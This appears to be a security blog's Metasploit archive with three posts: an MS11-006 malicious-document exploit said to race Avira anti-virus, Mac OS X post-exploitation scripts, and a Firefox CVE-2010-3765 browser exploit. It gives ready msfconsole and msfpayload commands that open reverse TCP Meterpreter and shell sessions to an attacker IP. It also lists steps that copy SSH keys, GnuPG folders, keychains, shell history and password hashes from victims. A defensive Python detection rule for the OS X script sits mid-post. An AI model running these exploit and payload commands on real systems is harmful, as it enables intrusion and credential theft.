Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

Metasploit Meterpreter race condition against Avira anti-virus

This video demonstrates a race condition against Avira anti-virus products. The race condition is due to design errors in the Avira anti-virus products themselves.

We will exploit the MS11-006 vulnerability (Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow) and use a reverse TCP Meterpreter payload.

As you will see, the installed “Avira AntiVir Personal” anti-virus detects the attack, but too late: the Meterpreter session is already created and you have access to the system.

The demonstrated product is an up-to-date “Avira AntiVir Personal”, but this race condition also appears in other Avira products, such as “Avira AntiVir Premium” and “Avira Premium Security Suite”.

Metasploit commands:

To create the msf.doc file that exploits the MS11-006 vulnerability:

use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

To listen for incoming Meterpreter sessions:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set InitialAutoRunScript migrate -f
exploit -j

Demonstration video:

Metasploit Mac OS X Post Exploitation : Enumeration and Hash Dump

As always, Carlos Perez aka Dark Operator, member of the PaulDotCom crew and Metasploit developer, is inspired. A new set of post exploitation scripts has been developed and integrated into the Metasploit framework repository. These scripts let you gather interesting information on a Mac OS X target.

These Metasploit post exploitation scripts support versions 10.3, 10.4, 10.5, 10.6 and 10.7 of Mac OS X. For the moment they only work with a “shell” payload, but Carlos is working on a version that supports full integration with Meterpreter. Carlos is also working on an iOS integration.

Mac OS X enum_osx post exploitation script

This script gathers the available data types by automating the execution of the “/usr/sbin/system_profiler” command. Depending on your Mac OS X version, more or fewer data types will be available. Some examples:

  • SPSoftwareDataType : Everything related to the system software (system version, kernel version, boot volume, boot mode, computer name, user name, time since boot and whether secure virtual memory is enabled).
  • SPNetworkDataType : Everything related to the network configuration (IPs, networks, gateways, configuration methods, proxies, MAC addresses, etc.).
  • SPBluetoothDataType : All information related to the Bluetooth configuration (shared folders, authentication requirements, etc.).
  • SPEthernetDataType : All information related to Ethernet cards (bus, vendor and device ID, vendor and device subsystem ID, revision ID, BSD name, Kext name, location and version).
  • SPAirPortDataType : All information related to the AirPort configuration (model, firmware version, current wireless network and channel).
  • SPNetworkLocationDataType : More detailed information on the network configurations.
  • SPUSBDataType : All information on the USB bus and connected devices.
  • SPPrintersDataType : All information on locally or remotely configured printers.
  • SPFirewallDataType : All information related to the local firewall (firewall mode, authorized applications, logging mode and stealth mode).
  • SPApplicationsDataType : All information on all installed software (version, last modification date, location, etc.).
  • SPDeveloperToolsDataType : All information on the installed development tools.
  • SPFrameworksDataType : All information on the Apple frameworks (version, last modification date, location, etc.).
  • SPStartupItemDataType : All information on the start-up items (description, location, requirements, start-up order preferences).
  • SPPrefPaneDataType : All information related to the preference panes (version, visible or not, identifier and location).
  • SPLogsDataType : All non-rotated log files and their recent contents.

Some other commands are also executed to gather more information:

  • Current TCP connections (netstat -np tcp).
  • Current UDP connections (netstat -np udp).
  • Environment variables (printenv).
  • Last boot time (who -b).
  • Current activity (who).
  • Process list (ps -ea).
  • List of all users (dscacheutil -q user).
  • List of all groups (dscacheutil -q group).
  • Download the contents of the “$HOME/.ssh/” folder.
  • Download the contents of the “$HOME/.gnupg/” folder.
  • Download the “$HOME/*_history” files.
  • Download the users' configured keychains, as listed by the “/usr/bin/security list-keychains” command.
  • Extract and download history files.
  • Take a screenshot of the current session in JPEG format.

As with the hashdump script, if the Metasploit session is running with Mac OS X root privileges, the SHA, LM and/or NTLM password hashes of the user accounts are dumped and downloaded.

All gathered information is saved in a “logs/post/enum_osx/hostname-date” folder under your “$HOME/.msf3” folder.
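From the defender's side, the command sequence listed above is the signature worth watching for. As an added example (not part of the original post or of Carlos Perez's scripts), here is a small Python correlation rule that flags the enum_osx collection pattern in process-execution telemetry; the log format and the sample events are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Indicator groups taken from the commands the post says enum_osx runs.
ACCOUNT_ENUM = ("dscacheutil -q user", "dscacheutil -q group")
KEYCHAIN_LIST = ("security list-keychains",)

# Constructed process-execution telemetry: "timestamp host parent_pid cmdline".
SAMPLE_LOG = """\
2011-03-01T10:00:01 mac01 4711 /usr/sbin/system_profiler SPSoftwareDataType
2011-03-01T10:00:02 mac01 4711 /usr/sbin/system_profiler SPNetworkDataType
2011-03-01T10:00:03 mac01 4711 /usr/sbin/system_profiler SPFirewallDataType
2011-03-01T10:00:04 mac01 4711 /usr/bin/dscacheutil -q user
2011-03-01T10:00:05 mac01 4711 /usr/bin/security list-keychains
2011-03-01T11:30:00 mac02 9001 /usr/sbin/system_profiler SPSoftwareDataType
2011-03-01T14:45:00 mac02 9002 /usr/bin/dscacheutil -q user
"""

def classify(cmdline):
    """Map one command line to an indicator group, or None if unrelated."""
    if "system_profiler" in cmdline and "DataType" in cmdline:
        return "profiler"  # any of the SP*DataType queries listed in the post
    if any(cmdline.endswith(c) for c in ACCOUNT_ENUM):
        return "accounts"
    if any(cmdline.endswith(c) for c in KEYCHAIN_LIST):
        return "keychain"
    return None

def find_enum_osx_patterns(log, window=timedelta(minutes=5), min_groups=2):
    """Return {(host, parent_pid): sorted groups} for parent processes that hit
    at least min_groups distinct indicator groups within one time window. Each
    command alone is routine admin activity; the burst from one parent is not."""
    seen = defaultdict(list)  # (host, ppid) -> [(timestamp, group)]
    for line in log.strip().splitlines():
        ts, host, ppid, cmdline = line.split(" ", 3)
        group = classify(cmdline)
        if group:
            seen[(host, ppid)].append((datetime.fromisoformat(ts), group))
    hits = {}
    for key, events in seen.items():
        events.sort()  # chronological, so events[i:] are at or after start
        for i, (start, _) in enumerate(events):
            groups = {g for t, g in events[i:] if t - start <= window}
            if len(groups) >= min_groups:
                hits[key] = sorted(groups)
                break
    return hits
```

Running `find_enum_osx_patterns(SAMPLE_LOG)` flags only mac01, whose parent process 4711 ran profiler, account and keychain queries within seconds; mac02 ran the same commands hours apart under different parents and is not reported.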

Metasploit enum_osx post exploitation

Mac OS X hashdump post exploitation script

As described above, this script focuses only on gathering the SHA, LM and/or NTLM password hashes of the Mac OS X user accounts and downloading everything to the Metasploit station. All gathered information is saved in a “logs/post/enum_osx/hostname-date” folder under your “$HOME/.msf3” folder.

Metasploit OS X hashdump post exploitation

To test these scripts you only need to create an executable payload for Mac OS X and follow these steps.

First, create the payload with msfpayload and upload it to the targeted Mac OS X system.

sudo msfpayload osx/ppc/shell_reverse_tcp LHOST=192.168.178.21 LPORT=4444 X > test

Then, in msfconsole, run the following commands.

use exploit/multi/handler
set PAYLOAD osx/ppc/shell_reverse_tcp
set LHOST 192.168.178.21
exploit -j

Then, on the targeted Mac OS X system, execute the test payload.

Or you could play with a valid Mac OS X system or application exploit. Here is a PoC video.

CVE-2010-3765 : Mozilla Firefox Interleaving document.write and appendChild Exploit

Timeline:

Vulnerability discovered in the wild
Vulnerability corrected by vendor on 2010-10-27
Vulnerability & Exploit-DB PoC disclosed by unknown on 2010-10-29
Metasploit PoC released on 2011-02-17

PoC provided by:

unknown
scriptjunkie

Reference(s):

CVE-2010-3765
MFSA 2010-73
EDB-ID-15352
OSVDB-ID-68905

Affected version(s):

All Firefox 3.6.x versions prior to version 3.6.12
All Firefox 3.5.x versions prior to version 3.5.15
All Thunderbird 3.1.x versions prior to version 3.1.6
All Thunderbird 3.0.x versions prior to version 3.0.10
All SeaMonkey 2.0.x versions prior to version 2.0.10

Tested on Windows XP SP3 with:

Firefox 3.6.9 released on 2010-09-23

Description:

This module exploits a code execution vulnerability in Mozilla Firefox caused by interleaved calls to document.write and appendChild. The exploit is a Metasploit port of the in-the-wild exploit.

Commands:

use exploit/windows/browser/mozilla_interleaved_write
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig